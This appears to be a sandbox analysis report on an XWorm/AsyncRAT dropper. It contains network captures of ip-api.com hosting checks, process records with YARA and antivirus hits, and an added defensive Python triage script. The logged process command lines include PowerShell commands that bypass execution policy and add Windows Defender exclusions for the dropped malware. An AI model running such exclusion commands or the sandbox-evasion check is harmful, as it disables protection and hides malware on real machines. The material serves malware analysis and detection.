                                                                         Nov 23, 2024 21:07:05.493390083 CET | 49707 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:05.613163948 CET | 80 | 49707 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:06.239458084 CET | 49710 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:06.359105110 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:06.359213114 CET | 49710 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:06.395164013 CET | 49710 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:06.514755964 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:06.585994959 CET | 80 | 49707 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:06.640013933 CET | 49707 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:07.548060894 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:07.593283892 CET | 49710 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:10.253650904 CET | 49712 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:10.380728006 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:10.380826950 CET | 49712 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:10.381438971 CET | 49712 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:10.501724958 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:11.570221901 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:11.625127077 CET | 49712 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:54.411241055 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:54.411295891 CET | 49712 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:56.243068933 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:56.243149996 CET | 49710 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:56.904710054 CET | 80 | 49707 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:56.904772997 CET | 49707 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:08:46.596468925 CET | 49707 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:08:46.912673950 CET | 80 | 49707 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:08:47.576385975 CET | 49710 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:08:47.858316898 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:08:51.593763113 CET | 49712 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:08:51.713782072 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.6
                                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                         Nov 23, 2024 21:07:05.146612883 CET | 55506 | 53 | 192.168.2.6 | 1.1.1.1
                                                                         Nov 23, 2024 21:07:05.284351110 CET | 53 | 55506 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 23, 2024 21:07:05.146612883 CET | 192.168.2.6 | 1.1.1.1 | 0xf317 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 23, 2024 21:07:05.284351110 CET | 1.1.1.1 | 192.168.2.6 | 0xf317 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
• ip-api.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49707 | 208.95.112.1 | 80 | 1020 | C:\Users\user\AppData\Roaming\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 21:07:05.493390083 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Nov 23, 2024 21:07:06.585994959 CET | 175 | IN | HTTP/1.1 200 OK
    Date: Sat, 23 Nov 2024 20:07:05 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49710 | 208.95.112.1 | 80 | 6876 | C:\Users\user\AppData\Roaming\Task Manager.exe

Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 21:07:06.395164013 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Nov 23, 2024 21:07:07.548060894 CET | 175 | IN | HTTP/1.1 200 OK
    Date: Sat, 23 Nov 2024 20:07:06 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 59
    X-Rl: 43
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49712 | 208.95.112.1 | 80 | 5492 | C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe

Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 21:07:10.381438971 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Nov 23, 2024 21:07:11.570221901 CET | 175 | IN | HTTP/1.1 200 OK
    Date: Sat, 23 Nov 2024 20:07:10 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 55
    X-Rl: 42
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false

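The three sessions above are one and the same request issued by three different dropped executables: GET /line/?fields=hosting against ip-api.com, which answers with the single word true when the client's public IP belongs to a hosting, colocation or datacenter range and false otherwise. That makes it a cheap analysis-environment check; the false reply seen here lets the sample carry on. The following Python is an added example, not part of the report and not code from any tool or from the sample, that triages HTTP session records of this shape: it parses the request line and Host header, reads the hosting answer from the response body, and flags requests that come from a user-writable folder or from a system process name (svchost.exe) running outside its system directory. The session records are hand-written to mirror the three above, plus one invented benign control; the record field names, the control process path and the function names are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed records mirroring the three HTTP sessions in this report plus one
# benign control; none of this is tool output and the field names are assumed.
HOSTING_REQ = "GET /line/?fields=hosting HTTP/1.1\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\n\r\n"
HOSTING_RESP = ("HTTP/1.1 200 OK\r\nContent-Type: text/plain; charset=utf-8\r\n"
                "Content-Length: 6\r\n\r\nfalse\n")
SESSIONS = [
    {"pid": 1020, "process": r"C:\Users\user\AppData\Roaming\svchost.exe",
     "request": HOSTING_REQ, "response": HOSTING_RESP},
    {"pid": 6876, "process": r"C:\Users\user\AppData\Roaming\Task Manager.exe",
     "request": HOSTING_REQ, "response": HOSTING_RESP},
    {"pid": 5492, "process": r"C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe",
     "request": HOSTING_REQ, "response": HOSTING_RESP},
    # Invented control: an installed application doing an ordinary geolocation lookup.
    {"pid": 4242, "process": r"C:\Program Files\ExampleApp\app.exe",
     "request": "GET /json/?fields=country HTTP/1.1\r\nHost: ip-api.com\r\n\r\n",
     "response": "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"country\":\"Switzerland\"}\n"},
]

# Names that legitimately live only under System32/SysWOW64 (assumed short list).
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "services.exe",
                "winlogon.exe", "conhost.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\roaming", "\\appdata\\local\\temp", "\\users\\public", "\\programdata")


def parse_request(raw):
    """Split an HTTP/1.1 request into method, path, requested 'fields' and Host."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    parts = urlsplit(target)
    fields = set()
    for value in parse_qs(parts.query).get("fields", []):   # "fields=hosting,proxy" is allowed
        fields.update(f.strip().lower() for f in value.split(",") if f.strip())
    return {"method": method, "path": parts.path, "fields": fields, "host": headers.get("host", "")}


def response_body(raw):
    _, _, body = raw.partition("\r\n\r\n")
    return body.strip()


def classify_session(session):
    req = parse_request(session["request"])
    body = response_body(session["response"])
    path = session["process"].lower()
    name = path.rsplit("\\", 1)[-1]
    hosting_check = req["host"] == "ip-api.com" and "hosting" in req["fields"]
    hosting = None                                   # what the client learned, if anything
    if hosting_check and body in ("true", "false"):
        hosting = body == "true"
    return {
        "pid": session["pid"],
        "hosting_check": hosting_check,
        "hosting": hosting,
        "user_writable_path": any(marker in path for marker in USER_WRITABLE),
        "masquerades_system_name": name in SYSTEM_NAMES and not path.startswith(SYSTEM_DIRS),
    }


def verdict(result):
    if result["hosting_check"] and (result["user_writable_path"] or result["masquerades_system_name"]):
        return "sandbox-evasion check from untrusted location"
    if result["hosting_check"]:
        return "hosting lookup (review)"
    return "no finding"


def hosting_check_pids(sessions):
    """PIDs of every process that asked ip-api.com whether it runs in a datacenter."""
    return sorted(s["pid"] for s in sessions if classify_session(s)["hosting_check"])


if __name__ == "__main__":
    for session in SESSIONS:
        result = classify_session(session)
        print(result["pid"], verdict(result), result)
```

The useful pivot in a real capture is the pairing of the request with the requesting process: ip-api.com itself is a legitimate service, so the host alone is a weak indicator, while a hosting lookup from %AppData% or from a fake svchost.exe is not.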

Target ID: 0
Start time: 15:06:59
Start date: 23/11/2024
Path: C:\Users\user\Desktop\dLRcE11Dkl.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\dLRcE11Dkl.exe"
Imagebase: 0x200000
File size: 1'801'728 bytes
MD5 hash: 68157ED3390FACA2A327E25148F4BD97
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 15:07:00
Start date: 23/11/2024
Path: C:\Users\user\AppData\Roaming\All function.cmd
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\All function.cmd"
Imagebase: 0xb60000
File size: 1'714'688 bytes
MD5 hash: FBD77E256063E3D225B8ECEC3BDBD6DB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 79%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 15:07:00
Start date: 23/11/2024
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase: 0xa20000
File size: 72'192 bytes
MD5 hash: E9A629DD7B0ACCDA9D7696FC15135663
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 4
Start time: 15:07:01
Start date: 23/11/2024
Path: C:\Users\user\AppData\Roaming\Task Manager.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\Task Manager.exe"
Imagebase: 0x3b0000
File size: 67'072 bytes
MD5 hash: C5ACDDD1F31EA152420CD0BEC24636BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 82%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 5
Start time: 15:07:01
Start date: 23/11/2024
Path: C:\Users\user\AppData\Roaming\All function.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\All function.exe"
Imagebase: 0xa10000
File size: 1'429'504 bytes
MD5 hash: 7F9590397ABD938CFD86A9A7A6E51EF6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 6
Start time: 15:07:05
Start date: 23/11/2024
Path: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe"
Imagebase: 0x7ff771350000
File size: 14'620'672 bytes
MD5 hash: D3565F59BBADCCEDED3D00831AF9B9E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 62%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 7
Start time: 15:07:05
Start date: 23/11/2024
Path: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe"
Imagebase: 0xe10000
File size: 68'608 bytes
MD5 hash: 2B1BCFF698482A45A0D01356AD3E0384
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, Author: ditekSHen
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 96%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 8
Start time: 15:07:06
Start date: 23/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 15:07:06
Start date: 23/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 15:07:06
Start date: 23/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 15:07:06
Start date: 23/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 15:07:11
Start date: 23/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 15:07:11
Start date: 23/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                        Target ID:16
                                                                        Start time:15:07:28
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:17
                                                                        Start time:15:07:28
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:19
                                                                        Start time:15:07:49
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:20
                                                                        Start time:15:07:49
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:21
                                                                        Start time:15:07:54
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:22
                                                                        Start time:15:07:54
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:23
                                                                        Start time:15:08:31
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:24
                                                                        Start time:15:08:31
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Reset < >
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a14c9b78eada10f9dfc10d2138326c13cdfb46d9cd86c25a22fce6b679050d55
                                                                          • Instruction ID: 496f69640c38f9a1ea8a208e81e9cfb7b835843e2e429e6ea25c9e748fe80a75
                                                                          • Opcode Fuzzy Hash: a14c9b78eada10f9dfc10d2138326c13cdfb46d9cd86c25a22fce6b679050d55
                                                                          • Instruction Fuzzy Hash: 7C31EB61B0DAC84FE795AB688CA92B87BE1EF9A305F0400BBD44DC32D3DD186C05C351
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 01770bd6a80d893fbd29c7c6a677d7ee39db63d59a8058a407f52a0878d4a13d
                                                                          • Instruction ID: c1bd3d3cb1620343ea38415e27bac6c3e3c8489ae1a433b3cfbdf80771b90c30
                                                                          • Opcode Fuzzy Hash: 01770bd6a80d893fbd29c7c6a677d7ee39db63d59a8058a407f52a0878d4a13d
                                                                          • Instruction Fuzzy Hash: 06718D70A199498FEB98EF68C4A8BAD77E2FF49314F104568D11AD32D1CF38AC45DB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 281ae84fd20f1d6260a4a3db5699aeb6a3cb5e8d69f4d2205c968c3ca009bf98
                                                                          • Instruction ID: 626a13c734f6b189acc9a3f20b00be2823847407cadaba37c17e735c529bfa0d
                                                                          • Opcode Fuzzy Hash: 281ae84fd20f1d6260a4a3db5699aeb6a3cb5e8d69f4d2205c968c3ca009bf98
                                                                          • Instruction Fuzzy Hash: 2831986288E3C25FC3439B709CB64A17FB09E4722070E44DBD4C4CB5E3D51C6A9AD762
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 26539a65bf915f402bad213380b4361f3759dfcfe32152d2beecd49d27a61622
                                                                          • Instruction ID: d30dfe0ee1e00f948fd809c1e694b8f075ce48e4d7ff58a741ae7407f0f9d631
                                                                          • Opcode Fuzzy Hash: 26539a65bf915f402bad213380b4361f3759dfcfe32152d2beecd49d27a61622
                                                                          • Instruction Fuzzy Hash: 1E21B671B18D4D8FFB94FB6C88A96B977D2EF99301B44047AE40EC32A3DD64AC418740
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
